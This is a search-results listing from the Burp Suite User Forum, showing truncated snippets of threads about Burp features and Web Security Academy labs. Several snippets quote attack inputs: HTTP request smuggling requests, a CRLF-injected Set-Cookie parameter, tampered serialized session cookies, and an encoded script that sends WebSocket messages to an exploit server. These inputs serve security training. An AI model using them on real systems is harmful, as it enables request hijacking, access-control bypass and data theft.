The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Found 250 posts in 219 threads

Browser receives "HTTP/1.0 200 Connection established" from BURP which received "HTTP/1.1 404 Not Found"

Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded ; charset=UTF-8 Content-Length: 67 Origin: https://www.XXXX.ca DNT: 1 Connection: keep-alive Referer s_vnum=15...%3D5; AMCVS_37...%40AdobeOrg=1; check=true; wz_svgmcv_idnum=92...92_5; s_cc=true; AWSELB=67 Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded ; charset=UTF-8 Content-Length: 67 Origin: https://www.XXXX.ca DNT: 1 Connection: close Referer:

Last updated: May 12, 2020 08:30AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Modifying serialized data types

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57% 74%39 Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 ??

this error: Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 Then, what I did is:

Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4:"User":2

Last updated: Jul 19, 2023 11:43AM UTC | 8 Agent replies | 15 Community replies | How do I?

HTTP Request Smuggling

The request for "Confirming TE.CL vulnerabilities using differential responses" is given as "POST /search Content-Length: 146 x= 0 POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 11 q=smuggling". Content-Length: 146 x=POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application /x-www-form-urlencoded Content-Length: 11 q=smuggling".

Last updated: Feb 14, 2022 01:54PM UTC | 1 Agent replies | 0 Community replies | How do I?

Unable to build http request with header

103.0.5060.134 Safari/537.36, Connection: close, Cache-Control: max-age=0, Content-Type: application/x-www-form-urlencoded , Content-Length: 67] <type 'java.util.ArrayList'> the value is the same in updatedheader and

Last updated: May 09, 2023 10:43AM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Modifying serialized objects

Connection: close Cookie: session=%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67% this - Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.

Last updated: Apr 06, 2021 03:26PM UTC | 2 Agent replies | 0 Community replies | How do I?

Scan Engine Disabled

But when updating to V2023.2 burpsuite, the scan engine is disabled.

Last updated: Apr 05, 2023 01:38PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Parameter handling

The blog posts you mention are all first page search engine results.

Last updated: Apr 02, 2020 09:29AM UTC | 3 Agent replies | 2 Community replies | How do I?

How do I search the support "forum"?

create new post" option but I don't really have time to read every single support request, I want to search a similar issue to me and see what happened, I'm sure this option used to exist but now there's no search

Hi Ian, Unfortunately, we do not currently have a search function available on our forums. Introducing a new search function for our forum, however, is currently being worked on by our website In the meantime, whilst not being ideal, you could always try and perform your search via search engine

Last updated: May 20, 2020 05:12PM UTC | 1 Agent replies | 0 Community replies | How do I?

Discover content requests with cookies

In case someone else needs this at a later point in time and finds this via a Search Engine, just as

Last updated: Jan 07, 2021 04:36AM UTC | 2 Agent replies | 3 Community replies | How do I?

Request Engine

I can not see in the Intruder in the options pannel the Request Engine which enable us to change the

Hi, Intruder now uses the main Burp Task Engine (in order to bring it inline with the other Burp tools

Last updated: Jun 07, 2021 07:53AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Send request in the same connection turbo intruder

req POST / HTTP/1.1 Host: example.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded : 0 GET / HTTP/1.1 X: x Turbo intruder script def queueRequests(target, wordlists): engine

Last updated: Sep 28, 2022 02:16PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com /search?

Last updated: Jul 05, 2021 10:20AM UTC | 0 Agent replies | 0 Community replies | How do I?

Server-side pause-based request smuggling ISSUE

web-security-academy.net Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4 Content-Type: application/x-www-form-urlencoded keep-alive GET /admin HTTP/1.1 Host: localhost def queueRequests(target, wordlists): engine

Last updated: Jul 05, 2024 08:21AM UTC | 4 Agent replies | 2 Community replies | How do I?

Academy Leaning Material minor mistake on "Finding HTTP request smuggling vulnerabilities" page.

the heading "Confirming TE.CL vulnerabilities using differential responses" reads as below: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Oct 08, 2021 12:52AM UTC | 0 Agent replies | 0 Community replies | Bug Reports

HTTP smuggling

For example i want to send this request to Confirming TE.CL vulnerabilities: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding : chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 03, 2022 04:04PM UTC | 2 Agent replies | 2 Community replies | How do I?

Burp task execution engine paused

I am using the below command to start my burp pro instance. Everytime I launch it burp launches with task execution paused. Is there a way to enable it by default? command: java -jar burp.jar...

Last updated: Aug 29, 2024 12:21PM UTC | 2 Agent replies | 1 Community replies | How do I?

why there is an empty line after Content-Length header in http smuggle attacks?

for example : POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 21, 2022 06:13PM UTC | 0 Agent replies | 1 Community replies | How do I?

HTTP Request Smuggling POST Request with Body

response portion starts with a POST request without a body and then smuggles a GET request: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded The HTTP Request Smuggler identifies two requests that are subject to smuggling: POST /search HTTP For example if I want to smuggle the following request my prefix variable is set to: '''POST /search

Last updated: May 29, 2020 08:12AM UTC | 1 Agent replies | 0 Community replies | How do I?

Parameter 'search'

LABS: Reflected XSS into HTML context with all tags blocked except custom ones No parameter 'search

Last updated: Oct 26, 2020 08:55AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: CSRF where token is tied to non-session cookie

Cookie: session=**************; csrfKey=************************* Content-Type: application/x-www-form-urlencoded session=*******************; csrfKey=<<"obtained CSRF cookie HERE">> Content-Type: application/x-www-form-urlencoded Went back to the original browser, performed a search from the wiener's page and sent the resulting request search=hat HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=****************; csrfKey search=green%0d%0aSet-Cookie:%20csrfKey=YOUR-CSRF_COOKIE HTTP/2 Host: LAB_ID.web-security-academy.net

Last updated: Aug 01, 2024 07:16AM UTC | 6 Agent replies | 8 Community replies | Bug Reports

How do I tell content-discovery to give up on a certain directory tree

Hi There isn't really a way to do this from the Content Discovery engine. However, if you go to "Settings > Search > Out-of-scope request handling", you can tell Burp to drop

Last updated: Jan 25, 2023 10:20AM UTC | 1 Agent replies | 0 Community replies | How do I?

Enterprise Scan Engine Update 2024.1.1.6

Hello, I can not download and install Scan Engine Update 2024.1.1.6.

Last updated: Mar 15, 2024 05:23PM UTC | 3 Agent replies | 4 Community replies | Bug Reports

Tabbed search

I would like to have a single search window and a possibility to perform multiple searches (and leave Preferably with an option in the user options to enable or disable tabbed search.

Last updated: Jul 06, 2022 10:26AM UTC | 2 Agent replies | 1 Community replies | Feature Requests

RegEx in HTTP history search crashes burp

Recently I had an issue that my project file got corrupted after using poorly optimized RegEx in burp search engine. of disabling auto-regex evaluation on startup or possibly a way to add RegEx timeout that would stop search

Last updated: Jan 02, 2020 01:51PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Chaining regexes

Does regex engine in Burp support look-forward regex syntax? I can't get it to work. =liqpw) But I'm getting 0 search results.

Last updated: Aug 02, 2019 08:17AM UTC | 1 Agent replies | 0 Community replies | How do I?

URL-encoded format--UTF 8

Try using the "Search" tab to search for UTF encoding.

Last updated: Nov 10, 2022 08:31PM UTC | 2 Agent replies | 2 Community replies | How do I?

Burpsuite v2021.10.3 freeze on launch (~30% chance of happening)

java 16.0.2 2021-07-20 Java(TM) SE Runtime Environment (build 16.0.2+7-67) Java HotSpot(TM) 64-Bit Server VM (build 16.0.2+7-67, mixed mode, sharing) Burpsuite v2021.10.3 Edition Windows 10 Home

Last updated: Jan 07, 2022 12:24PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Control of the Intruder Engine

Does the present version of burp suite provides any API to control the Intruder engine that means using

Last updated: Apr 13, 2017 03:22PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Public post search

I can't find my old post and the search menu only let me go through all results from the beginning of

Last updated: Jan 10, 2020 10:31AM UTC | 1 Agent replies | 0 Community replies | How do I?

I can't find request engine

I'm learning burp suite from portswigger learning paths and i cannot find this feature.

Last updated: Jun 04, 2021 08:48AM UTC | 1 Agent replies | 0 Community replies | How do I?

Search among extensions

Howver, I'd deeply appreciate a Search feature in "Extender / BApp Store" (and possibly in the Web version

Last updated: Oct 26, 2018 11:54AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Search Functionality Results

Searching for a particular string with "Target, Repeater, Proxy, and Organizer" all checked under "Tools". It is not returning the requests that contain that string which have a Source of "Proxy." However, if I uncheck...

Last updated: Aug 11, 2023 07:34AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

XSS DOM Based

Another great example where Burp is an information engine, more than a solution engine.

Last updated: Dec 13, 2021 02:16PM UTC | 1 Agent replies | 1 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to perform web cache deception (Solution incorrect)

POST / HTTP/1.1 Host: xxx-your-lab-id-xxx.web-security-academy.net Content-Type: application/x-www-form-urlencoded It was the Repeater results in the Burp Search for "POST /" that eventually returned the API Key....wierd

Last updated: Jun 25, 2021 07:17AM UTC | 4 Agent replies | 7 Community replies | How do I?

Getting started: Failure because Firefox 67 changes always http: to https:

Firefox 67 changes every URL from http: to https: and nothing works.

Last updated: May 29, 2019 04:15PM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: 2FA bypass using a brute-force attack

turbo intruder script def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint requestsPerConnection=100, pipeline=False, engine

Last updated: Jan 19, 2022 10:53PM UTC | 7 Agent replies | 16 Community replies | How do I?

Search regex extract

I'd like to have a way to have Burp Search extract all the values that match a certain regex or results a regex, saving the items without Base64 encoding, opening the file in Sublime, and using its regex search

Last updated: Nov 25, 2020 05:50PM UTC | 2 Agent replies | 0 Community replies | Feature Requests

search results value extraction

Would it be possible to add a grep value extractor, similar to what we have in intruder, to the overall search I may search for all requests with a certain value, but want to be able to see that, or another value in columns of the search window.

Last updated: Jul 10, 2017 01:37PM UTC | 2 Agent replies | 2 Community replies | Feature Requests

Turbo Intruder error

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Python script (almost unchanged from examples/basic.py): def queueRequests(target, wordlists): engine

Last updated: Jun 21, 2023 06:54AM UTC | 5 Agent replies | 7 Community replies | Burp Extensions

Search lacks scanner option

Hello, It would be very useful if there is a tickbox in Burp->Search.

Last updated: Sep 14, 2017 02:34PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Add time counter between Intruder requests (initiate an Intruder request every x seconds/minutes)

Look in Intruder > Options > Request Engine > Throttle

hey, there is no Request Engine here.

Last updated: Oct 16, 2024 07:36AM UTC | 6 Agent replies | 10 Community replies | Feature Requests

Filter for HTTP verbs in search

Hi guys! I was thinking that it might be useful to be able to filter searches for HTTP verbs (e.g., only POST, only GET, etc.). Thanks!

Last updated: Mar 17, 2022 08:50AM UTC | 2 Agent replies | 1 Community replies | Feature Requests

Additional Proxy History Search Filters

It would be really helpful to be able to specify proxy history searches to be limited to either requests or responses.

Last updated: Mar 19, 2019 12:38PM UTC | 1 Agent replies | 2 Community replies | Feature Requests

Search through nested values

nested insertion points for the scanner which is great but it could be very handy to be able to make search through nested values (ex: to search a string which is encoded in base64).

Last updated: Mar 07, 2018 09:57AM UTC | 0 Agent replies | 0 Community replies | Feature Requests

Workaround for Java errors opening Burp on a secondary display on Linux

encountered this and worked through it before I could blame Burp, so I want to post about it here for search-engine

Last updated: May 19, 2023 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

UTF-8 search not working

Could you enhance search to cover UTF-8 characters as well?

Last updated: Oct 16, 2017 10:09AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Make Search Match better for Comparer

I noticed there is a pre-defined shortcut for "Editor: Go to next search match", which is unfortunately

Last updated: Sep 22, 2017 01:34PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

File search and buttons don't work

I'm currently using the latest stable version of the Windows Desktop version. For some reason, whenever I'm trying to select a wordlist in Intruder or a session file, it doesn't work and all buttons loose all...

Last updated: Oct 30, 2023 09:45AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Installer fails on linux

0x00007fc60e3e112c, pid=81701, tid=81702 # # JRE version: OpenJDK Runtime Environment (16.0.2+7) (build 16.0.2+7-67 ) # Java VM: OpenJDK 64-Bit Server VM (16.0.2+7-67, mixed mode, tiered, compressed oops, compressed

Last updated: Dec 07, 2021 04:59PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Restrict search in responses or requests only

awesome, it would be even more awesome if it were possible, when searching for a string, to restrict the search

Last updated: Jan 28, 2019 03:31PM UTC | 1 Agent replies | 1 Community replies | Feature Requests

Bug in Search Windows using openJDK

Hello dear portswigger team, I have an issue using the Engagement Tools -> Search options. Some times after entering the search word a suggestion window will be created as separate jwindow objects (grey box and white box with digit 1 on the screenshot) and will not be killed after the search windows That means that these additional windows are still open and running after closing the parent search window

N.B: i m dealing with the search window on the Repeater.

Last updated: Oct 13, 2017 03:15PM UTC | 3 Agent replies | 2 Community replies | Bug Reports

How to Search user forum posts

don't mean to sound ignorant but I've been poking around the portswigger support site and can't find a search

Last updated: Jun 29, 2020 07:58AM UTC | 1 Agent replies | 0 Community replies | How do I?

Search feature for named repeater tabs

In addition to that, a search feature for the tab names would be great, since it (quicly) becomes tedious to search for a specific tab when you have 20, 30 or more tabs created.

Last updated: Sep 04, 2020 10:29AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

HTML rendering engine does not use upstream proxy configuration

When using Burp alongside an upstream proxy, rendering an HTTP response inside a response object will cause burp to fetch all page resources without going through the configured proxy. This can be pretty inconvenient...

Last updated: Feb 12, 2016 02:26PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Add "Search Bapp Store" Box

How about a search box that scans the names and description files to filter down the list.

Last updated: Dec 03, 2019 09:30PM UTC | 2 Agent replies | 2 Community replies | Feature Requests

Single Page Scanning

Both products use the same scan engine.

Last updated: Aug 03, 2022 11:34AM UTC | 3 Agent replies | 3 Community replies | Feature Requests

Engagement Tools -> Search = filter by HTTP status code

Hi, Many times I'm using Search from the Engagement tools. I know I can use searching, but if I need to search for something in the request; which results in specific

Last updated: Jan 19, 2021 11:22AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Finding all forms on a site

You do a search for a specific expression via the context menu / Engagement tools / Search.

Last updated: Nov 27, 2015 03:37PM UTC | 2 Agent replies | 1 Community replies | How do I?

Search field in Comparer and Order switch

Hello, It would be great to have a Searchfied in both Comparer windows and to be able switch the comparing priority between the 2 requests/responses on Comparer result window. thx

Last updated: Jun 22, 2020 01:17PM UTC | 2 Agent replies | 2 Community replies | Feature Requests

Randomize IP Header on Turbo Intruder using Engine.THREADED

I am able to randomize the header using engine=Engine.BURP but it gives me an average of 15 RPS. But, when I use engine=Engine.THREADED, I go to more than 500 RPS. solution on how do I generate some random values for X-Forwarded-For Header while using the THREADED engine def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, requestsPerConnection=50, pipeline=True, engine

Hi To clarify, your current method works fine when using the BURP engine. However, when changing the engine to THREADED, you encounter an issue.

The debug.py example script uses the threaded engine - if you run this, does the test succeed?

Last updated: Sep 27, 2022 03:08PM UTC | 2 Agent replies | 1 Community replies | How do I?

Burp Extension Python Import Error

def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, requestsPerConnection=100, pipeline=False, engine

queueRequests(target, wordlists): # to use Burp's HTTP stack for upstream proxy rules etc engine-Engine.BURP engine = RequestEngine (endpoint-target.endpoint, concurrentConnections pipeline=False, maxRetriesPerRequest=0, engine

Last updated: Sep 04, 2023 10:28AM UTC | 10 Agent replies | 10 Community replies | Burp Extensions

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Last updated: Jun 05, 2021 09:01AM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jul 10, 2020 08:07AM UTC | 3 Agent replies | 5 Community replies | How do I?

Force spider engine to wait for page to load (Automated spider)

the JavaScript content that's slow) Therefore I was wondering if it was possible to force the spider engine delay between spider requests to 20 seconds, but this still leaves me with the problem that the spider engine

Last updated: May 08, 2018 08:52AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Missing Engagement Tools Like Search and Find Comments

I have Burp Suite Professional, but it seems like I'm missing Engagement Tools. I have Find References, Discover Content, Schedule Task, and Generate CSRF PoC. What can I do to view to remaining Engagement Tools?

Last updated: May 24, 2022 07:08PM UTC | 1 Agent replies | 1 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 05, 2021 03:32PM UTC | 1 Agent replies | 2 Community replies | How do I?

intruder speed is as slow as free edition when i have professional

In Intruder -> Options -> Request Engine there are options that you can configure to fine tune the engine options first: https://portswigger.net/burp/documentation/desktop/tools/intruder/options#request-engine

Last updated: Dec 20, 2019 08:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

HTTP request smuggling, basic TE.CL vulnerability

i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 20, 2020 01:02PM UTC | 1 Agent replies | 1 Community replies | How do I?

Lab: Modifying serialized data types - Debug dumps tokens

p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Last updated: Aug 20, 2021 02:26PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Upgrade from 2021_8_3 to 2021_8_4 failing

0x00007f5f570dd0cc, pid=18219, tid=18220 # # JRE version: OpenJDK Runtime Environment (16.0.2+7) (build 16.0.2+7-67 ) # Java VM: OpenJDK 64-Bit Server VM (16.0.2+7-67, mixed mode, tiered, compressed oops, compressed

Last updated: Oct 11, 2021 11:08PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Last updated: Jan 30, 2020 10:00AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Dec 02, 2022 02:11PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

HTTP Request Smuggling

portwigger: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 06:44PM UTC | 1 Agent replies | 2 Community replies | How do I?

Burp Search -> Show this Request in HTTP History

I enjoy the main Burp search functionality (Burp -> Search menu option) which allows you to look for a particular search term within the requests/responses in the Proxy history. I realize Proxy History's "filter by search term" can be used to accomplish something similar results , however, it is not as powerful as the main burp search as you are not able to specify which sources to search (Req headers, resp headers, req body, resp body, etc).

Last updated: Sep 14, 2023 12:11PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Grep all responses for a specific string

Hi Alex, One way to do this is using the Search feature (Burp menu > Search).

Last updated: Nov 27, 2018 05:46PM UTC | 1 Agent replies | 2 Community replies | How do I?

How do I search within multiple requests in Proxy history

The search function only works within one request but not in multiple requests ?

What are you using to search for your requests? Is it "Burp > Search"?

Last updated: Dec 19, 2019 02:43PM UTC | 1 Agent replies | 0 Community replies | How do I?

macOSX V11.2 Big Sur, OWASP BWA and Virtual box--Home Hacking CyberSec Lab

r140961 (Qt5.6.3) OWASP BWA = Latest available from Sourceforge, links are in the book and a quick WWW search you'll find it.

Last updated: Feb 09, 2021 09:01PM UTC | 0 Agent replies | 0 Community replies | How do I?

Lab: SameSite Strict bypass via sibling domain - solution is broken

%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67% 66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67% 62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67% 65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%

Last updated: Jul 15, 2024 06:34PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

Browser Problem

Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86 )\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components \IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\iCLS\;C:\Program Files\Intel\ Intel(R) Management Engine Components\iCLS\;C:\Program Files\Common Files\Autodesk Shared\;C:\Program )\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components

Last updated: May 22, 2019 02:43PM UTC | 3 Agent replies | 2 Community replies | How do I?

Turbo Intruder with Session Handling Rules

I tried to use engine=Engine.BURP but that still didn't work. Here is my code, please help me. ------------------CODE------------------------------- def queueRequests(target, wordlists): engine endpoint=target.endpoint, concurrentConnections=1, engine

Last updated: Nov 04, 2022 01:50PM UTC | 1 Agent replies | 0 Community replies | Burp Extensions

Can Burp Pro crawl and download the site locally?

If you go to the Burp menu and choose Search, you can set the search to look through the Request and Response body so you can search for words or phrases across the Target, Proxy, and Repeater tools.

Last updated: Nov 07, 2022 09:37AM UTC | 2 Agent replies | 1 Community replies | How do I?

Even if you search with the search bar, the number of matches is not displayed and "0 highlights" is displayed.

string entered in advance in the HTTP message editor, the number of matches is not displayed in the search Enter a search string in advance in the search bar 2. request or response is displayed 3. (When the search hits) "0 highlights" at the bottom right of the screen glows blue for about 1 second you enter a search string in the search bar after the request or response is displayed, the number of in advance in the search bar.

Last updated: Sep 04, 2023 04:13AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

Searching/Matching/Extracting Arabic/Hebrew Keywords isn't Working

Yes it's displaying correctly, plus search bar works as expected.

Last updated: Mar 21, 2023 11:12AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

Turbo Intruder Not starting

I'm literally just stuck at "Engine warming up..."

Im still stuck at "Engine warming up..." even if i changed engine.THREADED to Engine.BURP Also yes

I'm still stuck at "Engine Warming Up.." when i try to run the "Debug.py" script

Hi Have you also tested out the debug script with both Turbo Intruder's engine and Burp's engine?

Last updated: Jun 23, 2024 12:15PM UTC | 7 Agent replies | 10 Community replies | Burp Extensions

PHP deserialization: Signature does not match

receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2

Last updated: Sep 05, 2023 06:14AM UTC | 1 Agent replies | 1 Community replies | How do I?

"Go" button of Engagement tools/Search box is lost

Hello, When you search long strings the "Go" button is lost after your first search. Well not completely lost but it is moved at the right when you search for 50+ char strings.

Last updated: Mar 11, 2017 06:28PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Search function to show repeater tab name/request number

Hi, In "Burp > Search", it would be great if the search result for repeater can also show the name

Last updated: Aug 11, 2021 03:42PM UTC | 1 Agent replies | 0 Community replies | Feature Requests

ca certificate

The URL is http://burp/ - there's no www.

Last updated: Jun 10, 2020 07:32AM UTC | 7 Agent replies | 9 Community replies | Bug Reports

Burp goes into headless mode with open jdk version 1.7.0_79

java.lang.System.loadLibrary(System.java:1088) at sun.security.action.LoadLibraryAction.run(LoadLibraryAction.java:67

Last updated: May 18, 2015 07:51AM UTC | 1 Agent replies | 1 Community replies | Bug Reports

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 29, 2021 08:07PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab : Modifying serialized data types. Bug Decoder?

The expected result should be: %54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67% %4f%6a%45%79%4f%69%4a%68%59%32%4e%6c%63%33%4e%66%64%47%39%72%5a%57%34%69%4f%32%6b%36%4d%44%74%39%43%67%

Last updated: Mar 15, 2021 01:48PM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Burp pro as windows container

home directory as a volume and include your Burp license in the file: - https://docs.docker.com/engine /reference/builder/#volume - https://docs.docker.com/engine/tutorials/dockervolumes/ The process

Last updated: Jul 15, 2019 07:07AM UTC | 2 Agent replies | 1 Community replies | Feature Requests

Ability to time requests?

In Burp Pro, the only scheduled task you can do is pausing and resuming the task execution engine. also set Intruder to start an attack after a specific length of time (Intruder > Options > Request engine

Last updated: Jul 01, 2020 10:32AM UTC | 1 Agent replies | 0 Community replies | How do I?

MacOS 10.15.7 Install - Artemis Virus Detection

McAfee Total Protection Version 4.9.0.2 (831) Anti-malware Version 4.9.0 (100) Engine Version

Last updated: Oct 15, 2020 09:05AM UTC | 2 Agent replies | 2 Community replies | Bug Reports

How do I control (start and finish) intruder attacks in specific exact time?

burp-suite-roadmap-update-july-2020 As part of these improvements, Intruder will be linked to the task execution engine which will then mean it will be part of the global settings for pausing/resuming the task execution engine

Last updated: Jul 16, 2020 01:13PM UTC | 1 Agent replies | 0 Community replies | How do I?

Search bar for "Open Existing Project" on Startup

A search function would be very appreciated there to quickly find the right project. Thank you :)

Last updated: Jun 20, 2024 07:29AM UTC | 1 Agent replies | 0 Community replies | Feature Requests

Lab 1 Directory traversal(File path traversal, simple case)

3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal

Last updated: May 06, 2022 09:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

